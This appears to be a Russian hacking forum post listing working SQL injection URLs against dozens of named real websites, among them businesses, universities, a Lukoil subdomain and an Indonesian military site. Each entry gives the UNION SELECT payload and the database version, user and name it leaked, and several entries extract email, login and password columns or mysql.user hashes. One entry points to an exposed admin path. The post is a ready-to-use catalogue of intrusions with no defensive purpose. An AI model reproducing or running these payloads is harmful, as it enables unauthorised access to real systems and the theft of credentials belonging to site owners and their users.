SQL Инъекции

Code:

http://www.antonpaleev.ru/show.php?id=52+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
http://www.ppp-pf.ru/show.php?id=154+and+1=0+union+select+1,2,3,4,5,6,7,8--
http://www.egyptt.ru/show.php?id=4+and+1=0+union+select+1,2--
http://www.datatec.ru/show.php?id=271+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.expertitalia.ru/show.php?id=1252182905+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

 

http://www.pc-coolers.ro/produs.php?id=-103+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*



Database Version: 4.1.22-log
Database name: pcc
User name: pcc@localhost
Os: redhat-linux-gnu

 

http://job.aviso.ua/news.php?id=-1482+union+select+1,2,version(),4,5,6,7--

 

Code:

http://orgo-x-libris.ru/show.php?id=13+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10--
http://www.jupiter-group.ru/product/?menu=Case&flag=2&id=46+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://www.ansmann.ru/catalog/second_1_1.php?id=-62+union+select+1,2,3,4,5,6,7,8+--+
http://wi-fi.auditory.ru/NNews.php?action=View&ID=30+and+1=0+union+select+1,2,3,4,5--

 

Code:

http://www.volgotrans.mv.ru/front/catalog.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database())--

5.0.51a-24-log:kater@localhost:volgotrans

Code:

http://www.alona-bondarenko.com/index.php?area=1&p=gallery&action=showimages&galid=-30+union+select+1,concat_ws(0x3a,version(),user(),database()),3

5.0.67-percona-highperf-b7-log:woyager@localhost:woyager

Code:

http://www.unitedbakers.ru/index.php?section_id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12--

Code:

http://www.unitedbakers.ru/index.php?section_id=-1+union+select+1,2,concat_ws(0x3a,email,u_login,u_passwd),4,5,6,7,8,9,10,11,12+from+users+limit+100,10000--

5.0.67:[email protected]:unitedbakersru_ub : portbld-freebsd7.0

Code:

http://www.newage.ru/?mod=s_page&sp_id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10,11,12--

Code:

http://www.newage.ru/?mod=s_page&sp_id=-2+union+select+1,2,3,4,concat_ws(0x3a,password,user),6,7,8,9,10,11,12+from+mysql.user--

5.0.67-log:root@localhost:test:redhat-linux-gnu

 

http://www.technique.ro/produs.php?produs=6+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13

Database Version: 5.0.81-community
Database name: rtec0602_technique
User name:rtec0602_rtech@localhost
Os: pc-linux-gnu

 

permneft.lukoil-perm.ru PR=4 TC=40 - поддомен Лукоил

http://permneft.lukoil-perm.ru/index.html?id=1/**/and/**/substring(version(),1,1)=5

Ветка - 5

 

rentv2@localhost
4.1.25-log
rentv2

 

ТИЦ: 10
PR: 5

Code:

http://ebar.com/news/article.php?sec=news&article=-4254%20union%20select%201,2,3,4,5,6,7,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--

Version = 5.0.81-community
User = ebar_ebar@localhost
Database:ebar_ebclass
Database:ebar_ebar

Code:

http://www.peabody.uga.edu/news/event.php?id=59+and+1=0+%20Union%20Select%201,2,UNHEX%28HEX%28version%28%29%29%29,4,5,6,7,8,9

Version = 5.0.82-log
User = Peanuts@localhost
Database:mysqlev_Peabody_com_liveeasandCarrots:test

Code:

http://www.reden.dk/index.php?section_id=-52%20union%20select%20database%28%29%20--

Version = 4.1.22-standard
User = [email protected]
Database = reden_dk_db4

Code:

http://www.antonygormley.com/wip.php?sectionid=1+and+1=0+%20Union%20Select%201,database%28%29,3,4,5/*

Version = 4.0.24_Debian-10sarge2-log
User = [email protected]
Database = antonygo

 

Code:

http://www.tni.mil.id/gallerydtl.php?id=147&cid=-27+UNION+SELECT+1,2,3,concat_ws%28version%28%29,user%28%29,database%28%29%29,5,6,7--

версия MySQL: 5.0.77
юзер: ayam@localhost
имя базы: elang

из таблички user вывел:

 

Katholieke Universiteit Leuven:

Code:

http://soc.kuleuven.be/sw/nieuws/itemid.php?id=-7+union+select+1,2,3,4,unhex%28hex%28concat_ws%280x20,version%28%29,database%28%29,user%28%29%29%29%29,6,7,8,9,10,11,12/*

Version: 4.1.13-standard-log
Database: fsw
User: [email protected]

 

PR: 6

Code:

http://www.academicintl.com/main_pages.php?section_id=5&content_id=121+and+1=0+%20Union%20Select%20%20%20UNHEX%28HEX%28version%28%29%29%29

Version = 5.0.70-log
User = apihost_webDB@localhost
Database = apihost_API :: apihost_dev
Tables:CP_users :: AO_users
Columns: Table CP_users
LAST_LOGIN
FIRST_NAME
LAST_NAME
EMAIL
PASSWORD
DOKUGROUP

 

Code:

http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7--

4.1.25-log:atur@localhost:atur

Code:

http://advayta.org/item/000013/?id=3+and+substring(version(),1,1)=5

5.1.35

 

http://www.virsteana.ro/en/produs.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--


Database Version: 4.1.21-standard-log
Database name: virst_virsteana
User name: virst_virst@localhost
Os: pc-linux-gnu

 

INFOCYT (PR: 6):

Code:

http://www.infocyt.cl/info.php?id=-1+union+select+1,2,3,4,5,6/*

Version: 4.1.20
Database: infocyt
User: adm_infocyt@localhost

 

http://www.tecoprestcom.ro/produs.php?id=-10+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7

Database Version: 4.1.22-log
Database name: whtecoprestcomroa
User name:tecoprestcomroa@localhost
Os: redhat-linux-gnu

 

Pension Primus:

Code:

http://www.czechpensionen.cz/info.php?id=-1+union+select+1,2/*

Version: 4.0.18-Max-log
Database: czechpensionendb
User: pension@localhost

-----------------------------------

Axiom College (PR=4):

Code:

http://www.axiomcollege.com.au/training-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Version: 5.0.67-community-nt
Database: axiom
User: root@localhost

Есть доступ к mysql.user:

Code:

http://www.axiomcollege.com.au/training-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x20,user,password,file_priv),11,12,13,14,15,16+from+mysql.user--

 

http://www.scauneitalia.ro/produs.php?id=-47+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11

Database Version: 5.0.51a-community
Database name: scauneit_wisemedscauneitalia
User name:scauneit_wisemed@localhost
Os: redhat-linux-gnu

 

Code:

http://www.pure-red.com/en/hongkong/news/index.php?news_id=-1%20union%20select%201,2,group_concat(username,0x3a,password),4%20from%20admins--

Code:

http://www.musiquemachine.com/reviews/reviews_template.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,%20version(),10,11,12,13,14,15,16,17--

 

Владельцам червонца посвещается
http://vaz2110.net/view_text.php?id=-4+union+select+1,2,3,group_concat(0x0b,column_name),5,6,7+from+information_schema.columns+where+table_name=0x757365726c697374
MySQL 5.0.51a-24+lenny1
http://vaz2110.net/view_text.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x3a,pass),3,4,5,6,7+from+userlist
типа админка http://vaz2110.net/admin/ прошол по пути в ошибке
http://vaz2110.net/admin/include/